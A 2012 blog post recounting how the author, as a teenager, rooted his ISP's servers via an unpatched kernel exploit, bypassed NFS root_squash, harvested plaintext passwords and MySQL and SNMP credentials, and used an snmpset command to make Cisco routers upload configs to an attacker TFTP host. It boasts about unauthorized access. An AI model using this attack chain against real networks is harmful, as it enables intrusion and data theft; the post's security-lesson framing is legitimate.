
Why Best Practices Are Important (or: How I Pwn’d The Shit Out Of My ISP)

by Jeremy L. Gaddis on September 28, 2012



Note: The events described herein took place many, many years ago (the statute of limitations has long since expired!), but the moral of the story remains the same. This topic came up on IRC a few nights ago and since a) several were interested in the story and b) I’m heading out to DerbyCon shortly, the timing seemed appropriate.

It’s 2 a.m. and I’m the stereotypical inquisitive teenager furiously typing away on the PC in the corner of my darkened bedroom.

I had connected — via dialup — to my ISP and used SSH to access one of their servers (let’s call it “alpha”), an x86 box running Red Hat Linux (RHL, not RHEL). This server ran telnet, SSH, and FTP daemons in order to provide remote access to both e-mail and the files in a user’s home directory (mostly so that one could dump stuff in ~/public_html/ and make it available via HTTP). In addition, this was the only server that users could directly log in to.

Though I had logged in to alpha hundreds of times before to send and receive email, I’d never really “looked around” the system. For whatever reason, I became curious and started “exploring” in an attempt to see how my ISP had set their environment up.

One of the first things I noticed was that user home directories were mounted via NFS, which made sense since the HTTP server ran on another machine. Likewise, /var/spool/mail was mounted via an NFS share from the mail server.

In all, there were four filesystems mounted via NFS on alpha:

  • /home/a/ mounted over NFS from server bravo,
  • /home/b/ mounted over NFS from server charlie,
  • /home/c/ mounted over NFS from server delta, and
  • /var/spool/mail/ mounted over NFS from server echo.
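
On alpha, the mount table would have looked something like this (a reconstruction; the export paths, mount options, and addresses are illustrative, not from memory):

$ mount -t nfs
bravo:/export/home/a on /home/a type nfs (rw,hard,intr,addr=10.0.0.2)
charlie:/export/home/b on /home/b type nfs (rw,hard,intr,addr=10.0.0.3)
delta:/export/home/c on /home/c type nfs (rw,hard,intr,addr=10.0.0.4)
echo:/export/mail on /var/spool/mail type nfs (rw,hard,intr,addr=10.0.0.5)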

After a bit of looking around, I discovered the meaning behind the layout of /home.

Regular customers had their home directories under /home/a/, business customers under /home/b/, and the administrators themselves under /home/c/.

Naturally, I was drawn to /home/c/.

The home directories of the system administrators themselves were accessible by anyone, although many of their subdirectories weren’t, thanks to their permissions. I spent a bit of time exploring the files and directories I did have access to but, alas, there was not much of interest to be found.
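
A quick ls is all it takes to spot that kind of exposure (hypothetical output, but representative of what I was looking at; the username is a stand-in):

$ ls -ld /home/c/admin /home/c/admin/private
drwxr-xr-x  14 admin  users  1024 Sep 21 14:02 /home/c/admin
drwx------   2 admin  users  1024 Sep 21 14:02 /home/c/admin/private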

But I wanted access to the rest of the files and, luckily, it wasn’t hard to get.

A local root vulnerability for older versions of the Linux kernel had been discovered a good while before. Unfortunately for me, it had long since been fixed and new versions made available. Fortunately, however, the administrators at my ISP (we’ll call them “Alice” and “Bob”) hadn’t bothered updating their servers.

A little while later, I had tweaked the exploit code slightly so that it would work on this server, compiled it on my local machine, and transferred it to alpha. It took only a few seconds to execute.
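
The whole process looked roughly like this (a sketch; the exploit filename and username are stand-ins, and I’m hand-waving the tweaks):

$ gcc -o sploit sploit.c           # build the tweaked exploit locally
$ scp sploit jeremy@alpha:/tmp/    # ship it up to the shell server
$ ssh jeremy@alpha                 # log back in ...
$ /tmp/sploit                      # ... and pop a root shell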

# id
uid=0(root) gid=0(root) groups=0(root)

I had gained root access on alpha, the server belonging to my ISP!

My job wasn’t done yet, however.

You see, there’s an NFS server option called root_squash, which prevents the root user on an NFS client from actually having root privileges on the mounted filesystems. Thus, while I was root on alpha, I still couldn’t access any of those files I wanted to. Luckily, there’s an easy fix for that:

# su alice
$ id
uid=1000(alice) gid=100(users) groups=100(users)
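
For reference, root_squash is configured per export on the NFS server, and it only remaps UID 0 (typically to nobody); any other UID passes through untouched, which is exactly why su does the trick. A hypothetical /etc/exports entry on delta might have read:

/export/home/c alpha(rw,root_squash)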

I was now, in effect, logged in as one of the system administrators, with access to everything in their home directories.

Digging through those files led to an interesting discovery: they kept all of their users’ passwords in plain text!

When I noticed that they were using NFS to share filesystems across servers, I had naturally assumed that they were also using NIS — the two often go hand-in-hand. Instead, when a user’s password needed to be changed, they’d update it locally on a central server. Custom scripts on that server then took care of pushing it out to all of their other servers (including their RADIUS servers), thus keeping everyone’s passwords synchronized.

I’d found the treasure — getting the plain-text password of every single user is quite an achievement!

Looking at their script, I gained insight into how the process worked. It was invoked on demand whenever a password changed, and it carried out its job without any interaction from whoever ran it.
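
I never kept a copy of their script, but a minimal sketch of the idea (every hostname, path, and filename here is invented) might look something like this:

#!/bin/sh
# sketch: push freshly-generated password files out to every box
for host in alpha bravo charlie delta echo radius1 radius2; do
    scp /etc/sync/passwd.new root@${host}:/etc/passwd.new
    ssh root@${host} 'mv /etc/passwd.new /etc/passwd'
done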

But where was it getting the passwords from? MySQL.

While quite popular today, MySQL was still fairly new at the time and, I’ll confess, I didn’t know much about it. Luckily, I had a couple of PCs at home running Linux and, before long, I was intimately familiar with MySQL from an administrator’s perspective.

Armed with the MySQL credentials from their scripts, I connected to the MySQL server and started looking around. I had already found the proverbial pot of gold, but I was about to find another pot as well.
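
“Looking around” mostly meant poking at things from the mysql client (the hostname, username, and schema here are placeholders, not the real ones):

$ mysql -h db1 -u syncuser -p
mysql> SHOW DATABASES;
mysql> USE accounts;
mysql> SELECT login, password FROM users LIMIT 10;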

Like pretty much every other ISP (at the time), this one had a large infrastructure running — almost exclusively — Cisco gear. And, like pretty much every other ISP, they used SNMP (mostly via homebrew Perl scripts) to manage it.

The credentials that their custom script used to access the password database had superuser privileges on the MySQL server. A script that only needed to read rows from a single table in a single database actually had full permissions on every database on the server.

This oversight granted me access to a separate database on the MySQL server — the one where they stored their per-device SNMP community strings. Amazingly, in stark contrast to violating every other best practice in existence, every Cisco device on their network used separate read-only and read-write community strings. Unfortunately for them, I was staring at all of ’em.
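
Concretely, “staring at all of ’em” was a single query away (again, the database and column names are invented):

mysql> SELECT hostname, ro_community, rw_community FROM netmgmt.devices;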

I don’t recall its name now, but there existed a program which, given an SNMP read-write community string, would quickly download the running configuration from a Cisco device and save it locally (I’m sure there are hundreds of these today). All such a tool needs is a list of targets and, armed with valid credentials to every server on their network, gathering that information wasn’t a problem: the zone files on their primary DNS server, for example, were well commented and described exactly what every device was.
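
You don’t even need a special tool, really. With net-snmp and a TFTP server of your own, the old Cisco writeNet OID from OLD-CISCO-SYS-MIB will make an IOS device of that era upload its running configuration to you. A sketch, with the community string, hostname, and addresses as placeholders:

$ snmpset -v1 -c s3cretRW core1.example.net \
    .1.3.6.1.4.1.9.2.1.55.192.0.2.10 s "core1-confg"

Here 192.0.2.10 is a TFTP server you control; the device writes its running config there as core1-confg.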

A short time later, I was reading through the running configurations of their core infrastructure devices and, armed with the read-write community strings, I could have made any changes I wanted to.

Summary

In a short period of time, I had escalated my privileges from those of a normal user to the superuser.

Not only had I gained root access on one of their servers, but I had also acquired the plain-text passwords of every single customer. None of us customers could SSH into any server except alpha, but Alice and Bob could. Equipped with their passwords, now I could too.

That local root vulnerability I mentioned? Yep, it was present on every other Red Hat Linux server they were running too.

I had root access to their shared hosting servers, which hosted hundreds of customer websites.

I had access to the stored e-mail of every single customer — and the system administrators themselves.

Last, I had administrative access to every switch and router on their network.

Pwned? Fuck yeah.

Note: Next week I’ll post a “shit they should have done differently” article, explaining how following best security practices could have mitigated my attempts to compromise their environment.
